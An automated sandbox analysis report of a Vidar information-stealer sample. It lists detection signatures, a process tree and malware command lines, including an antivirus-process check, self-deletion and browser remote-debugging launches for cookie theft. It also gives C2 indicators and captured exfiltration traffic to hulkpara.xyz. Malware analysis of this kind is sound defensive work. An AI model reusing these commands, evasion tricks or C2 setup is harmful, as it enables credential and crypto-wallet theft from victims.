Windows Analysis Report
pM3fQBuTLy.exe

Overview

General Information

Sample name:pM3fQBuTLy.exe
renamed because original name is a hash value
Original sample name:c5f715f9eefa5e42fd10fc3b6e90953b.exe
Analysis ID:1578042
MD5:c5f715f9eefa5e42fd10fc3b6e90953b
SHA1:92ae82a3ce9799e2af542597f9edb94c4ef1d6c5
SHA256:f5ad3ca6464635488824c3e5b6284ca263e7c6417ec854692d839a1c008d5e23
Tags:exe, user-abuse_ch

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • pM3fQBuTLy.exe (PID: 1092 cmdline: "C:\Users\user\Desktop\pM3fQBuTLy.exe" MD5: C5F715F9EEFA5E42FD10FC3B6E90953B)
    • cmd.exe (PID: 5456 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6856 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5912 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7312 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7320 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7368 cmdline: cmd /c md 325114 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7384 cmdline: findstr /V "Grocery" Pink MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7400 cmdline: cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Miniature.com (PID: 7416 cmdline: Miniature.com d MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 8060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2432,i,10762324331143125605,3752248268113785829,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 3084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 3744 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6124 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7432 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 2648 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1504 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6048 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6364 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6540 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7532 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1092 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
16.2.Miniature.com.170000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Miniature.com d, ParentImage: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, ParentProcessId: 7416, ParentProcessName: Miniature.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7788, ProcessName: chrome.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\pM3fQBuTLy.exe", ParentImage: C:\Users\user\Desktop\pM3fQBuTLy.exe, ParentProcessId: 1092, ParentProcessName: pM3fQBuTLy.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, ProcessId: 5456, ProcessName: cmd.exe
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit, CommandLine: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Miniature.com d, ParentImage: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, ParentProcessId: 7416, ParentProcessName: Miniature.com, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit, ProcessId: 3744, ProcessName: cmd.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5456, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7320, ProcessName: findstr.exe


                AV Detection

                Source: https://hulkpara.xyz/Avira URL Cloud: Label: malware
                Source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: pM3fQBuTLy.exeVirustotal: Detection: 9%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.7% probability
                Source: pM3fQBuTLy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49737 version: TLS 1.2
                Source: pM3fQBuTLy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C7DC54
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C8A087
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C8A1E2
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00C7E472
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00C8A570
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C866DC FindFirstFileW,FindNextFileW,FindClose,16_2_00C866DC
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C4C622 FindFirstFileExW,16_2_00C4C622
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00C873D4
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C87333 FindFirstFileW,FindClose,16_2_00C87333
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C7D921
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB

                Networking

                Source: Network trafficSuricata IDS: 2058401 - Severity 1 - ET MALWARE StealC/Vidar CnC Domain in DNS Lookup (hulkpara .xyz) : 192.168.2.7:49532 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49714 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49713 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49712 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49715 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49717 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49711 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49736 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49716 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49741 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49740 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49737 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49770 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49760 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49739 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49807 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49789 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49816 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49825 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49832 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49842 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49850 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49854 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49863 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49865 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2058402 - Severity 1 - ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) : 192.168.2.7:49868 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.7:49715 -> 94.130.191.168:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.191.168:443 -> 192.168.2.7:49715
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.191.168:443 -> 192.168.2.7:49714
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.7:49712 -> 94.130.191.168:443
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: DNS query: hulkpara.xyz
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.108
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C8D889 InternetReadFile,SetEvent,GetLastError,SetEvent, 16_2_00C8D889
                Source: global traffic HTTP traffic detected: GET /k04ael HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Connection: Keep-Alive Cache-Control: no-cache
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global traffic DNS traffic detected: DNS query: cvCCAtzStAgfHNw.cvCCAtzStAgfHNw
                Source: global traffic DNS traffic detected: DNS query: t.me
                Source: global traffic DNS traffic detected: DNS query: hulkpara.xyz
                Source: global traffic DNS traffic detected: DNS query: www.google.com
                Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
                Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
                Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global traffic DNS traffic detected: DNS query: assets.msn.com
                Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----TR9Z5XBSR1N7YU3OPPZ5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
